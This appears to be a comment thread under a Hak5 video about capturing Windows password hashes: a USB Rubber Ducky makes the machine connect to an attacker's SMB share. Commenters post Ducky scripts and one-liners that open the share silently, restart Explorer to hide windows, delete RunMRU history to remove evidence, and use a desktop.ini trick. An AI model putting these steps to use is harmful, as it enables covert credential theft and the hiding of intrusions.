Well, since you guys said it... I got it down to 0.5 seconds ....... \o/
Why do you use the Explorer to connect to the share and not the net use command?
That way no Explorer window pops up :D
Great point - and I have no idea why I didn't think about that... Thanks!
no problem :D
there is a micro SD card slot on the surface
You can then do "net use /DELETE \\ipaddress" directly afterwards and not leave anything listed if they against all odds do a "net use". Cleanup is king.
I was wondering the exact thing
now at the end of your script add:
taskkill /F /IM explorer.exe>nul
start explorer.exe
might wanna add some delays to make sure it works. (They'll just think windows crashed again :D )
Looking everywhere for a Hak5 field kit. There was only 3 at BSides Augusta that they were raffling off. I just knew that was the last time I would see them. Wish I was one of the fortunate ones.
Question for Darren, what ducky scripts work when WIN+R is disabled for all the machines on the network?
Shannon, what is the mini device with you, the mini device on the right hand side? Which model?
What about if you force NTLMv2? Also, Windows 10 has credential guard that is supposed to mitigate pass the hash vulnerabilities. Have you tried on Windows 10?
I did this with a VBS script and got it in around .45 sec, nice video love you guys so much and keep doing whatever you are doing :)
Rusty Anera Can I please have the script?
+Hak5 +Hak5Darren where can I find the wifi pineappling book for sale?
It'll be in the HakShop next week
+Darren Kitchen thank you
Haha! I was wondering the same thing myself! Couldn't find it in the shop.
Awesome show
I didn't know you were a hacker :D
Could you not put a samba server in the cloud, and use a turtle to then vpn into that box, or would that not work. Not sure how the subnetting would function
Where can we get the WiFi Pineapple book? I don't see it at the Hak Shop.
+Hak5, what is the little device at the back of the table you guys keep touching?
Looks like a GPD Win, but I can't tell for sure...
[edit] Saw it at TekThings, not a GPD Win... but what else?!?
The Lan turtle should get the SMB server as a module...
Hi there, what kind of hash is that? It is separated by ":", so which one is it? Great video!
You can also close an Explorer window with Ctrl+W
You could just use Powershell to browse the share instead of explorer and it will close by itself when done. Something like cmd /c start /min powershell "dir share"
Tried this and it takes time to output the contents of the remote directory, so there's more than just initiating a connection going on there. I have a pushd / popd method in my comment above which works in something like 200ms, but I'm sure something similar could be done with PowerShell (assuming PS hasn't been disabled by the admins).
In Windows 10 you need to add the option "-smb2support" to the smbserver tool because the SMB1 protocol is disabled there by default
Daren owned the show today. Snubs learn samba.
I actually already knew samba (duh), but we do this thing called Watsoning, where one host asks questions for the audience while the other answers. If you've ever seen Sherlock, you've seen this in action. - Shannon
Yep....need more Rubber Duckies....Ordering another right now.
Couldn't you restart explorer to get rid of the open windows?
So Darren, great series - I'm a fan! I have a tetra, nano and a ducky.... I want the Pineapple book! Where do I find it? I checked the interwebs - can't see it...
What's the deal with using VMWare Workstation?
That Pineapple Mod, so awesome.
Any update/ETA on the Nano in your EU Store?
"net use" can be used to connect to a smb share from the command line. This way you don't have to worry about figuring out how to close explorer using the ducky.
I just got to thinking that if you had access to a domain controller, you could edit the group policy to run something like the equivalent of the ducky script from before to grab clear text credentials and send them elsewhere. I'm thinking that when someone signs into a domain, they probably don't think much of a command prompt window that opens minimized and then disappears. Then again, if you have direct access to the DC, there might be easier ways to get to the passwords, but possibly not in plain text. At that point, you would have to attack hashes. Assuming you could compromise a domain admin account, you could do this. Again, probably better ways to do this, but I just wanted to share what I was just thinking.
Awesome video guys! What's the small pocket PC in the back? Never seen that one before.
Keep up the awesome videos!
He used it in a previous video. Last season I believe.
So how do I decode a hash like this? I didn't really understand it.
lol --- why are you using VMWare when your copy of Windows supports Hyper-V which has docker support?
what do u do with the hashes once you have captured them
Crack them.
just got done rewriting the ducky script in vbs and put it on a cd with autorun
does it only work on port 445 or can you change it in a config file and then port forward it to get passwords from any where
No. Samba port cannot be changed on Windows. Opening a share will default to 445 and you cannot open a share on another port.
damn
Anyone know if there is a LANTurtle module to run the SMBServer from Impacket
Hello Can you bring Back the usb Rubber ducky in the europe hakshop?
thank you
Shannon, is that an XPS 13 or 15?
13
If you are using Windows 10, did you ever achieve more than around 70% of CPU usage? I've never seen mine going there even when I tried to.
What do you do when the client has disabled cmd and command execution for all accessible users?
GUI e
F4
CTRL a
STRING \\0.0.0.0
ENTER
ALT F4
Any idea when the LAN turtle will be back in stock?
It's back, just about to grab one but I'm waiting for the hak5 kit instead
Well done hak5 Team,
but i would use Powershell
powershell -noprofile -windowstyle hidden {access to \\10.10.1.1 or payload}
What kind of hash is that?
Correction: Bo didn't give you the stickers, I did. Also the USB Rubber Duck I adopted is doing fine, Fred gets along very well with Tommy the Lan Turtle.
Hey tell me why didn't we erase the browsing history of the runline in this case like we did in last week's episode of the rubber ducky with mimikatz
Your talk about putting something "legit" on that share got me thinking..... Don't minimize it at all! Instead:
MAKE IT LOOK LIKE THE FLASH DRIVE
The user is going to be suspicious that the "USB Drive" didn't pop up. So why not make the share look like the contents of the flash drive?!
How would one crack said hashes?
I want your tshirt... Looks amazing
The problem with running the entire command within the run box is that the command history is left behind - not great for more tech savvy targets. Could just go with opening cmd and going from there. It would increase time of course but ultimately leave behind less evidence
Or you could add a couple lines of code and delete the command history in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
How about some MS office macro hacking or something like that?
No need to get into Explorer. Net use is way quicker. Problem is that all of these calls and attacks can be traced back if those computers are in a domain. So I wouldn't use this in a corporate environment.
Unless it's been resolved, the first time a ducky is inserted into a windows machine it takes anywhere from 30-90 seconds for windows to find and install HID drivers (the ducky is not USB). This has to be accounted for with a huge delay setting or the script will fire before the device is available, and fail.
So... in a real world setting how are you guys getting a 2 second execution :)
Well, actually you don't need a ducky for this. You need a thumb drive with a directory and a desktop.ini in it.
With a modification to the desktop.ini the authentication happens instantly when Explorer is opened by the user.
+Hard Reset Hmmm..you're absolutely right, that's an excellent way of accomplishing it!
Currently going thru a Voyager re-watch on Netflix now. :)
TNG Currently *Yay Canadian Netflix got it back*, then DS9 or Voyager.
Great job, will try out this with my ducky.
what are credentials?
Do something with the teensy please.
would i need a vmalware station
wait what's "hacking"?
How about making one for mac :D
How to crack this hash ??
How many times do you reckon this guy's been rejected by her?
i'd say his chances are better than yours
why you gotta burn him like that
probably OVER 9000 (times)!!
Are you an idiot? Why do you say that?
Savage
So many hacks could be solved just by not allowing random USB things automatically become devices in system... Probably should invest some time in this to harden my setup.
Don't forget to clear any evidence from the MRU's when you finish ..ahem.. testing the system.
Load PSkill on the remote share and you can kill the explorer session
press CTRL + W to close explorer window
Is there a reason this video is over 26 minutes?
quickest way to get hash is to ask any random rasta for his local hashish dealer, I thought you knew that by now darren...
Good episode, thanks :)
cmd /C "start /MIN explorer \\localhost"
taskkill /im explorer.exe
this would be less detected
It would but there is a way faster way to do it
Using the commandline net use you can run it minimized in a self destructing cmd using:
DELAY 1000
GUI r
DELAY 200
STRING cmd /c start /min net use \\$ipaddress ^&exit
If the samba server is already running, it will work under 2 seconds (but it leaves evidence behind in the run bar)
Eliott Castafolte nice but you're missing quotes
What a super hack and so simple!
Why didn't we erase the history as we did last week??
History of runline
*runs and hides behind evil server*
the girl with the Faraday cage
have you guys checked out droidducky?
easier just to crack the SMB login with hydra
smb = 445 not 4445. "135/139/445" the evil trias! :P
Nice work.
./smbserver.py -comment 'test-share' TMP /tmp/
Traceback (most recent call last):
File "./smbserver.py", line 24, in
logger.init()
AttributeError: 'module' object has no attribute 'init'
Thanks
I need those stickers 😂 please
I love the videos, but can you please make some shorter videos. I don't want to watch a full 30 min video
17:30 😂😂😂
thanks! you guys are so badass ツ
I get it, now on duty
Gone in two seconds =)
cool!
Kikiki
plz hack roblox accounts
Freudian: th-cam.com/video/BH4M7djZfew/w-d-xo.html
Too much waffle. Please get to the point.
First!
No.
first lol